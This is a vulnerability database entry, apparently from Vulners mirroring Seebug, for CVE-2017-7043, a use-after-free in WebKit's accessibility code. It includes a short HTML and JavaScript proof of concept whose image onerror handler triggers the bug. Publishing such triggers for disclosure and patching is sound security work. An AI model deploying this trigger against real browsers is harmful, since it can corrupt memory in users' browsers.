Lucene search

K

WebKit: use-after-free in WebCore::AccessibilityRenderObject::handleAriaExpandedChanged(CVE-2017-7043)

🗓️ 27 Jul 2017 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 28 Views

use-after-free in WebCore::AccessibilityRenderObject::handleAriaExpandedChanged(CVE-2017-7043). Vulnerability confirmed on WebKit nightly ASan build. Accessibility features need to be enabled to trigger the bug

Show more
Related
Code

                                                <style>
  #div { visibility: collapse }
</style>
<script>
function eventhandler() {
  document.execCommand("bold", false);
  img.style.removeProperty("-webkit-appearance");
  img.setAttribute("aria-expanded", "false");
}
</script>
<div id="div">
<dl>
<canvas>aaa</canvas>
<img id="img" src="x" style="-webkit-appearance: relevancy-level-indicator;" onerror="eventhandler()">
                              

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
27 Jul 2017 00:00Current
8.3High risk
Vulners AI Score8.3
EPSS0.524
28
.json
Report